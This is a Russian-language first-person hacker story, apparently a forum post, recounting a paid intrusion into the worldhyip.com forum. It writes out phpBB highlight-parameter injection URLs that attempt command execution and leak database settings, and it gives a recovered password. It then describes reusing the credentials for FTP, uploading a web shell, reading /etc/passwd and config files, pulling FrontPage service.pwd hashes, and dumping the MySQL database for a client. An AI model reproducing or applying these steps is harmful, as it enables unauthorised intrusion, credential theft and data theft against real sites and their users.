Взлом форума worldhyip.com [взлом vBulletin Version 3.0.3.]

Заканчивалось лето, закончились деньги. Что бы преодолеть финансово-половой кризис пришлось взять халтурку на дом.
Поступил только один заказ на взлом форума worldhyip.com. Посмотрел на него и взгруснул. Апач свою версию не показывает. Ни внешней ни внутренней инклуды.
Форум Powered by: vBulletin Version 3.0.3. Патченный. Засада. Порты даже сканить нестал, чтобы не растраиваться.

Единсвенный путь который подсказывало сердце это поискать другие бажные сайты у того же хостера. Воспользовавшись базой http://domainsdb.net/ установил что тут же хоститься еще 300 с лишним сайтов.
Это вселяло надежду. Весь следующий день я просматривал список хостящихся сайтов. Пятая часть вообще не функционировала. Две трети составляли убогие домашние странички тайваньцев, с редким вкраплением американцев.
Нашел пару шопов с тележкой Zen Cart, но мои прошлые опыты не принесли мне успеха в ее ковырянии. Были и форумы phpBB от 2.0.3 до 2.0.11 и vBulletin Version от 3.0.0 до 3.0.6, но все патченые.
Была еще вот такая замануха http://xxx.com/pages/pg.php3?ond=Zeep%20maken&cat='zeep но я оставил ее напоследок.

Я уже думал забить клин на это дело, но вот мне попался сайт с phpNuke и форумом phpBB 2.0.10. Проверив его на sql-инъекцию я увидел что он бажный. Вот только была одна проблема, команды не выполнялись.
http://xxx.com/modules.php?name=Forums&file=viewtopic&t=2&highlight=%2527.system($_GET[cmd]).%2527&cmd=ls
http://xxx.com/modules.php?name=Forums&file=viewtopic&t=2&highlight=%2527.$poster=%60$cmd%60.%2527&cmd=ls

Эффект ноль, только кряказябра )\b#i показывающая что форум непатченный.
Тогда попробовал посмотреть dbuser:dbpasswd:
http://xxx.com/modules.php?name=Forums&file=viewtopic&t=2&highlight=%2527.$poster=$dbuser.%2527
http://xxx.com/modules.php?name=Forums&file=viewtopic&t=2&highlight=%2527.$poster=$dbpasswd.%2527
то же самое. День был не мой.

Зато запрос:
http://xxx.com/modules.php?name=Forums&file=viewtopic&t=2&highlight=%2527.$poster=$dbhost.%2527
выдал первый положительный ответ: 203.194.240.131
Тогда мне пришла в голову мысль что админ наверное изменил значения $dbpasswd и $dbuser.
Тогда я еще не знал, что в версиях phpBB под phpNuke эти значения выглядят по другому $dbpass и $dbname.
И точно, запрос:
http://xxx.com/modules.php?name=Forums&file=viewtopic&t=2&highlight=%2527.$poster=$dbpass.%2527
вернул мне пароль: Anarar1+
С $dbuser этот номер не прошел, я так и не смог подобрать значение, копание в документации по phpBB я решил оставить до утра.
Пошел спать.

Утром проснулся, и понял что я осел. Незнаю почему, но в Mozille форумы phpBB на phpNuke у меня всегда криво отображались.

Логин был все время у меня перед глазами в сообщении об ошибке:
Warning: Cannot modify header information - headers already sent by (output started at /home/login_xxx/www/www/header.php:32)
in /home/login_xxx/www/www/includes/page_header.php on line 492

Прошлый опыт показывал, что пара логин/пароль на phpBB иногда подходила и к фтп.
Удача. Зашел, залил веб-шел.

И снова облом. Прав на просмотр содержимого /home нет, uname не работает.
Заливать все подряд эксплойты под Linux в надежде получить рута не фортило.
Что-то подсказывало, что ядро свежее.

Смотрю путь до веб-сервера /home/login_xxx/www/www/, лезу в /etc/passwd и по аналогии пытаесь открыть ls -pa /home/worldhyip/www/www
И вновь судьба повернулась ко мне лицом. Вижу список файлов.

Выдераю пароли к форуму cat /home/worldhyip/www/www/forum/includes/config.php
Коннекчусь к MySQL дамплю базу.

Вижу также пароли от Фронтпаги:
/_vti_pvt/service.pwd

и логин/пассвор еще к одной MySQL-базе:
/config/config.php

Забираю пароли и дамп базы. Базу отправляю заказчику, а денежку получаю и пропиваю.

Твой bug Durito.
_________________
EAT THE RICH!